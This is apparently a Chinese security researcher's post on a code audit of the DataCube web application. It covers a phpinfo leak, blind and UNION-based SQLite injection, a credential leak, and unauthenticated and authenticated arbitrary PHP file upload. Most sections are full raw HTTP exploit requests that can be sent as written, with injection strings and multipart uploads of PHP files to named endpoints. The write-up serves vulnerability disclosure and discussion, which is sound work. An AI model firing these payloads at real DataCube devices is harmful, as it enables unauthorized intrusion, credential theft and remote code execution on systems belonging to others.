在这里分享一下通过拖取 DataCube 代码审计后发现的一些漏洞，包括前台的文件上传，信息泄露出账号密码，后台的文件上传。当然还有部分 SQL 注入漏洞，因为 DataCube 采用的是 SQLite 的数据库，所以SQL 注入相对来说显得就很鸡肋。当然可能还有没有发现的漏洞，可以互相讨论。

phpinfo 泄露

SQL注入

无回显的SQL注入

/DataCube/www/admin/setting_schedule.php

SQLite 没有sleep()函数，但是可以用 randomblob(N) 来制造延时。randomblob(N)函数是SQLite数据库中的一个常用函数，它的作用是生成一个指定长度的随机二进制字符串。

正常请求时间

POST /admin/setting_schedule.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Connection: close
​
datetime=2024-04-24+02%3A00'+or+randomblob(9000000000000000000000000)+and+'1&tbl_type=fs&delete=1

延时响应

判断对应的 SQLite 的版本号

POST /admin/setting_schedule.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
​
datetime=-1'or+(case+when(substr(sqlite_version(),1,1)<'4')+then+randomblob(900000000000000000000000000)+else+0+end)+and+'1&tbl_type=fs&delete=1

可以判断出SQLite的版本是3

有回显的SQL注入

POST /admin/pr_monitor/getting_index_data.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
​
req_id=1) UNION ALL SELECT sqlite_version(),NULL,NULL--

查询出 sqlite 的版本号

www\admin\pr_monitor\getting_index_data.php

www\admin\pr_monitor\getting_screen_data.php#getData

www\admin\pr_monitor\getting_screen_data.php#getMonitorItemList

信息泄露

www\admin\config_all.php

将从 SQLite3 数据库中获取的数据转换为一个 JSON 字符串，并输出在页面上

任意文件上传

www\admin\transceiver_schedule.php

POST /admin/transceiver_schedule.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryb8tU2iptV70lGozq
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
​
------WebKitFormBoundaryb8tU2iptV70lGozq
Content-Disposition: form-data; name="upload_file"; filename="test1.php"
Content-Type: application/octet-stream
​
<?php phpinfo(); ?>
------WebKitFormBoundaryb8tU2iptV70lGozq
Content-Disposition: form-data; name="usb_schedule"
​
1
------WebKitFormBoundaryb8tU2iptV70lGozq--
​

后台任意文件上传

www\admin\setting_photo.php

www\admin\setting_photo.php#insertPhoto

www\admin\images.php

登录后获取参数 accesstime 的值

将值替换到数据包中

POST /admin/setting_photo.php HTTP/1.1
Content-Length: 414
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarydzDlRcTHEmG3mohY
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
​
Connection: close
​
------WebKitFormBoundarydzDlRcTHEmG3mohY
Content-Disposition: form-data; name="add"
​
1
------WebKitFormBoundarydzDlRcTHEmG3mohY
Content-Disposition: form-data; name="addPhoto"; filename="test.php"
Content-Type: image/jpeg
​
<?php phpinfo(); ?>
------WebKitFormBoundarydzDlRcTHEmG3mohY
Content-Disposition: form-data; name="accesstime"
​
0.05027100 1713945976
------WebKitFormBoundarydzDlRcTHEmG3mohY--
​

成功将文件上传到 /images/slideshow/ 目录下

尚未解决的后台SQL注入

类似的注入有很多，但是每一次都进行了 accesstime 的校验，所以需要不停的从页面上获取，这里仅从一处来进行探讨

www\admin\config_time_sync.php

www\admin\Util.class.php#TblConfUpdate

我们很明显的可以看到这里的SQL 语句是我们可控的

首先请求页面 /admin/config_time_sync.php 来获取一个 accesstime 值

再构造请求进行发包

我们将执行的 SQL 语句打印出来

BEGIN EXCLUSIVE;delete from tbl_conf where key = 'ntp.enable';insert into tbl_conf values('ntp.enable', 'true');select randomblob(999900000000000000000000000);select ('1');COMMIT;BEGIN EXCLUSIVE;delete from tbl_conf where key = 'ntp.server';insert into tbl_conf values('ntp.server', 're-ene.energia.co.jp');COMMIT;BEGIN EXCLUSIVE;delete from tbl_conf where key = 'ntp.retry_count';insert into tbl_conf values('ntp.retry_count', '5');COMMIT;

这里很奇怪，已经完美的闭合并提示执行成功，却没有执行这条语句，有明白的大佬可以一起讨论一下。